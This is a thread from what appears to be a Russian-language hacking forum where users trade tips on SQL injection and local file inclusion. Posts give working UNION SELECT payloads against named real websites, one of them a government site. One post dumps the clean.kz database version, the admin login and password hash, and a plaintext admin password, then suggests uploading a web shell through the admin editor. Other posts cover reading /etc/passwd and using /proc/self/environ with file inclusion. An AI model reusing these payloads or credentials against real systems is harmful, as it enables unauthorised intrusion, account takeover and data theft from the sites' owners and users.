ребята, у меня 3 вопроса вот уже долго инетресуеют, но думал со временем пойму, но не смог ) 1. Как понять запрос: and 1=0, или or 1=1 2. когда запрос начинается с ?id=-11+union.... - это значит именно этот - (минус) в начале ? 3. часто, или постоянно в инексиях замечаю такое: select+1,2,3,4,5,6,7,8,9,10,11,12.. или такое: /../../../../../ можете обяснить что это значит и от чего зависит длина т.е. откуда берется эти цифры.
Для кого статьи придумали? 1. 1 никогда не 0, условие не выполняется, нужно для скуль 0 равно 0, выполняется, также ноебходмо 2. минус ставится, чтобы в Бд не было такого айди дабы выводились видимые поля 3. цифры - для поиска выводимых полей. ../ - для инклуда файлов, пднятие по каталогам Вообще, почитай статьи
http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+order+by+20 -true http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+1=1 -true http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+substring(@@version,1,1)=3,4,5 -false как прокрутить скуль?
Может быть тут нужно условие?) http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+if%28substring%28@@version,1%20,1%29=1,1,0%29 Не пробывал,но помоему оно необходимо
Возможно скрипт работает с другой БД.Укажите в запросе имя БД Code: -11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+[B]database[/B].tablename+--+ Имя базы данных: Code: -11+union+select+1,2,3,concat_ws(0x3a,table_name,table_schema),5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+ Зы:Может не хватать прав на доступ спасибо) А можно немного по подробней, из=за чего не отображалось с "-" а с "999999999999" заработало? и что означает "-+&sec=2"? ____________________________________ И еще я сюда напишу сразу, может кто подскажет, я тут перечитываю заново некоторые статьи, например вот в этой https://forum.antichat.ru/thread19844.html написано, как искать подобного рода уязвимости? почти все статьи что я читаю указывают параметр "?id=" и дальше пробовать подставлять разные значения, но тоесть получается не обязательно нужен "?id=" ? но и любой параметр подойдет, например встречал "?int=" "?e=" "?i=" , с ними также пробовать подставлять, или вообще на сайте (в урле) искать любое числовое значение и пробовать менять и подставлять к нему данные?
http://clean.kz/index.php?act= Выдает ошибку Warning: main(/home/clean/data/public_html/modules/.php) можно ли произвести локальный инклуд И еще как узнать название всех таблиц в sql 4.1.25
Помоему просто мусор. Можно так. http://asiane wsnet.net/news.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* На счёт второго вопроса, можно и с id=, и с int= и e=, это просто другие названия переменных и не более...Моё имхо, лучше для начала сделать простенький сайтец, php+mysql+ещё что-то), желательно с нуля, после чего тебе будет всё более понятней и интересней. Ествественно в ходе создания сайта, в теории ты выучишь хотя php и mysql.. Потому как сразу без какого-то рабочего опыта, будет сложновато. Так как там magic_quotes_gpc=on, то нулем не заменишь, разве что через /////////[...].
Торможу, не спал вторые сутки.Сильно не пинайте =) Не могу обрезать запрос, как только не пробовал, добавляется ,3
/* и +--+ и +--+- и { и # и -- и вообще без close, все равно Уже всю голову поломал себе... Разве никто не сталкивался? Спать хочу =(
Code: http://clean.kz/index.php?act=idx&id=-53+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user())-- User : mysql_clean@localhost Version : 4.1.25 Database : intserv_clean OS : freebsd 6.3 Code: http://clean.kz/index.php?act=idx&id=-53+union+select+1,2,3,4,concat_ws(0x3a,login,pass)+from+admin-- 7b8fbb831c7c7163aa67b658ab3f3d64:28f9fb91cebfd9e08dfc467ac2d735d9 http://clean.kz/admin/ Логин : cleanadmin Пароль : 93mgpt5hm В админке через "Редактор содержания" можешь залить шелл. Таблицы в 4 ветке брутит надо (юзай SIPT)
народ, подскажите плз, что можно еще сделать.. допустим есть сайт, с ошибкой, пробую провести sql inj, вижу version() user() database(), кавычки не слешируются(magic_quotes_gpc = Off ?), пытаюсь вывести /etc/passwd , ничего не показывает, загрузить также ничего не смог, не хватает прав. Пытаюсь просмотреть таблицу, все поля выводит, но ничего интересного не могу найти, ни username, admin и тп, ничего нет. Что еще можно попробовать? зы И вот еще +group+by+1+--+ - пишет ошибку +group+by+0+--+ - ошибки нет как так может быть?
Ну если только у скули есть file_priv, не фильтруються кавычки, но нету прав для записи в папку доступной из веба, и есть lfi, то ты понел да?у /proc/self/enivron, насколько я знаю есть права на запись, ну ты понел?
1) В скуле нет. 2) Шелл можно проинклюдить только при allow_url_include = On, а всегда можно выполнить произвольный PHP код.
